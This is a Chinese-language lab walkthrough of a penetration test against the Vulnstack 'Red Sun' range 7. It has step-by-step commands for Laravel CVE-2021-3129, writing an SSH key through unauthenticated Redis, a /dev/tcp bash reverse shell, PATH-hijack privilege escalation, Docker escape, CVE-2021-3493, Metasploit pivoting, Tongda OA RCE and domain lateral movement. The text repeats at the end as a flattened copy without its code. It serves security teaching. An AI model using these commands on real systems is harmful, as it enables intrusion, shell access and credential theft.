红日内网靶场7渗透测试教学文档

靶场环境搭建

下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/
环境搭建注意事项：
- Ubuntu启动环境需要切换到root用户
- OA系统文件实际位于pc1而非教程中提到的pc2

初始信息收集

DMZ区域端口扫描结果：
- 22 (SSH)
- 80 (HTTP)
- 81 (HTTP)
- 6379 (Redis)

漏洞利用过程

1. Laravel框架漏洞利用 (CVE-2021-3129)

发现81端口使用Laravel框架，右下角显示版本号
使用一键shell工具上传webshell：
- 工具地址：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
确认Docker环境：
```
cat /proc/1/cgroup
```

2. Redis未授权访问利用

直接连接Redis：
```
redis-cli -h 192.168.1.9
```

写入SSH公钥：

生成密钥：
```
ssh-keygen -t rsa
```

准备公钥文件：

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

写入Redis：

cat foo.txt | redis-cli -h 192.168.1.9 -p 6379 -x set hello

Redis端操作：

config set dir /root/.ssh
config set dbfilename authorized_keys
save

SSH连接：
```
ssh 192.168.1.9
```

3. 网络拓扑发现与跳板利用

发现192.168.52.0/24网段
81端口设置了52段主机做代理

使用52.10作为跳板机反弹Docker容器shell：

bash -c 'exec bash -i &>/dev/tcp/192.168.1.9/2333 <&1'

在SSH主机监听：
```
nc -lvnp 2333
```

4. 权限提升

查找SUID文件：

find / -user root -perm -4000 -print 2>/dev/null

利用环境变量提权：

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/jobs
./shell

5. Docker逃逸

通过SSH密钥实现逃逸：

在已控主机生成密钥：

ssh-keygen -f hello
chmod 600 hello
cat hello.pub

在Docker容器内操作：

cp -avx /hello/home/ubuntu/.ssh/id_rsa.pub /hello/home/ubuntu/.ssh/authorized_keys
echo > /hello/home/ubuntu/.ssh/authorized_keys
echo '复制的.pub文件内容' > /hello/home/ubuntu/.ssh/authorized_keys
cat /hello/home/ubuntu/.ssh/authorized_keys

使用ubuntu用户登录：
```
ssh -i hello ubuntu@192.168.52.20
```

使用CVE-2021-3493提权：
- 工具地址：https://github.com/briskets/CVE-2021-3493
- 编译执行：
```
gcc exploit.c -o exploit
chmod +x exploit
./exploit
```

6. 内网横向移动

使用MSF建立会话：

use exploit/multi/script/web_delivery
set lhost 192.168.1.9
set LpORT 4445
run

添加路由：
```
route add 192.168.52.0 255.255.255.0 1
```

建立SOCKS代理：

use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 11111
run

配置proxychains：

vi /etc/proxychains.conf
# 添加：socks5 127.0.0.1 11111

7. 通达OA漏洞利用

发现192.168.52.30:8888为通达OA 11.3
使用RCE工具：
- 工具地址：https://github.com/admintony/TongdaRCE
- 修改payload为蚁剑连接方式
通过CS反弹shell

8. 域渗透

使用MSF扫描93段：

use auxiliary/scanner/netbios/nbname
set rhosts 192.168.93.1-100
run

发现主机：192.168.93.30(域管)和192.168.93.40
使用抓取的域管明文密码进行横向移动

关键工具与漏洞

漏洞利用：
- CVE-2021-3129 (Laravel)
- CVE-2021-3493 (Linux提权)
- 通达OA 11.3 RCE
工具列表：
- Laravel一键利用工具
- Redis-cli
- MSF (Metasploit Framework)
- Proxychains
- Cobalt Strike
- 通达OA RCE工具

参考链接

详细分析：https://xz.aliyun.com/t/9574#toc-1
Laravel EXP：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
提权EXP：https://github.com/briskets/CVE-2021-3493
通达OA RCE：https://github.com/admintony/TongdaRCE

红日内网靶场7渗透测试教学文档靶场环境搭建下载地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 环境搭建注意事项： Ubuntu启动环境需要切换到root用户 OA系统文件实际位于pc1而非教程中提到的pc2 初始信息收集 DMZ区域端口扫描结果： 22 (SSH) 80 (HTTP) 81 (HTTP) 6379 (Redis) 漏洞利用过程 1. Laravel框架漏洞利用 (CVE-2021-3129) 发现81端口使用Laravel框架，右下角显示版本号使用一键shell工具上传webshell：工具地址：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP 确认Docker环境： 2. Redis未授权访问利用直接连接Redis：写入SSH公钥：生成密钥：准备公钥文件：写入Redis： Redis端操作： SSH连接： 3. 网络拓扑发现与跳板利用发现192.168.52.0/24网段 81端口设置了52段主机做代理使用52.10作为跳板机反弹Docker容器shell：在SSH主机监听： 4. 权限提升查找SUID文件：利用环境变量提权： 5. Docker逃逸通过SSH密钥实现逃逸：在已控主机生成密钥：在Docker容器内操作：使用ubuntu用户登录：使用CVE-2021-3493提权：工具地址：https://github.com/briskets/CVE-2021-3493 编译执行： 6. 内网横向移动使用MSF建立会话：添加路由：建立SOCKS代理：配置proxychains： 7. 通达OA漏洞利用发现192.168.52.30:8888为通达OA 11.3 使用RCE工具：工具地址：https://github.com/admintony/TongdaRCE 修改payload为蚁剑连接方式通过CS反弹shell 8. 域渗透使用MSF扫描93段：发现主机：192.168.93.30(域管)和192.168.93.40 使用抓取的域管明文密码进行横向移动关键工具与漏洞漏洞利用： CVE-2021-3129 (Laravel) CVE-2021-3493 (Linux提权) 通达OA 11.3 RCE 工具列表： Laravel一键利用工具 Redis-cli MSF (Metasploit Framework) Proxychains Cobalt Strike 通达OA RCE工具参考链接详细分析：https://xz.aliyun.com/t/9574#toc-1 Laravel EXP：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP 提权EXP：https://github.com/briskets/CVE-2021-3493 通达OA RCE：https://github.com/admintony/TongdaRCE